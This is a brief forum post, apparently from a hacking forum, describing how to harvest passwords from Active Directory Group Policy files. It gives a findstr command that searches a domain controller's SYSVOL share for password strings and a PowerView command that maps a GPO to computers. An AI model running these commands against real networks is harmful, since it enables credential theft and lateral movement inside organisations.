• XSS.stack #1 – первый литературный журнал от юзеров форума

Passwords in GPOs

Sec13B

(L3) cache
Пользователь
Регистрация
05.01.2023
Сообщения
257
Реакции
39
Group Policies are an inexhaustible source of information.
From them you can learn about various security settings, you can get configuration and connection files, and you can get passwords.
Group Policy files can be accessed by any user authorized in the domain.

Command to search
Код:
findstr /spin /c:”passw” \\dc.lab.local\SysVol\lab.local\* > result.txt

PowerView
Код:
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх